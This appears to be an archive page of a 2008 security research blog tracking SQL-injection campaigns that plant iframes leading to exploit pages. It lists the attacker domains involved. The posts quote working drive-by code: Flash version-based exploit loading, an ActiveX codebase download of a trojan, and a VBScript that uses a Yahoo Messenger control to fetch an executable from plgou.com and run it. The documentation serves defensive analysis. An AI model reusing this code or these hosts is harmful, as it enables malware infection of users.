Archive for August, 2008

www2.1000ylc.cn/csrss/w.js

Posted in sql injection on August 23, 2008 by s3cu

new sql injected domain.

Strangely, the domain is currently not resolvable.

additional domains with hhr2ehght.com

Posted in sql injection on August 18, 2008 by s3cu

below are additional domains resolving to same IP address as hhr2ehght.com reported previously.

  • ggqvehght.com
  • eyigehght.com
  • bbjvehght.com

www.bluexzz.cn/g.js

Posted in sql injection on August 12, 2008 by s3cu

another sql-injected domain.

/g.js redirects to /g.js?ckoafx=59812 which contain iframes of 14.htm and 456.htm

Content of 14.htm is a VBScript as follows:
Continue reading

hhr2ehght.com/cgi-bin/index.cgi?mentat

Posted in sql injection on August 8, 2008 by s3cu

Another malicious domain. Other domains that resolve to same IP addresses are

  • aykjfgves.com
  • bkgpfgves.com
  • busyfgves.com
  • dmiafgves.com
  • faj4ehght.com
  • gfdpves.com
  • hwh2ght.com
  • iwi5fgves.com

Continue reading

other domains of jjmaobuduo.3322.org

Posted in sql injection on August 8, 2008 by s3cu

The domains below all belong to the same IP address which are used for injection.

  • jjmaoduo.3322.org
  • jjmaoduo2.3322.org
  • plgou.com
  • sdo.1000mg.cn
  • http://www.plgou.com
  • xxkk.net
  • www3.800mg.cn (added 18 Aug 2008)
  • www0.douhunqn.cn (added 23 Aug 2008)
  • ppexe.com (added 23 Aug 2008)
  • http://www.ppexe.com (added 23 Aug 2008)

jjmaobuduo.3322.org/csrss/w.js

Posted in sql injection on August 6, 2008 by s3cu

a new round of attacks haveĀ  started.
w.js contains iframe src from http://www.plgou.com/csrss/htm.htm
htm.htm contains iframes from

  • <iframe src=flash.htm width=100 height=0></iframe>
  • <iframe src=06014.html width=100 height=0></iframe>
  • <iframe src=yahoo.htm width=100 height=0></iframe>
  • <iframe src=office.htm width=100 height=0></iframe>
  • <iframe src=ksx.htm width=100 height=0></iframe>

flash.htm calls i1.html if browser is MSIE, else call f2.html (presumably firefox). Depending on the flashplay version the respective flash exploit is retrieved:

var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}
document.write("")

Interesting content for ksx.htm:
<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1" width="800" height="191"></object>

infrequently used clsid for downloading trojan.

office.htm contains snapshot viewer exploit.

yahoo.htm uses exploits Yahoo Messenger to download trojan:

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"ti
any"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script>

www.worldofwarcrokft.com/1/Office1.htm

Posted in sql injection on August 2, 2008 by s3cu

as reported in the previous blog, this file seems to be reported by Symantec as a new attack vector.

Content of Office1.htm as follows
Continue reading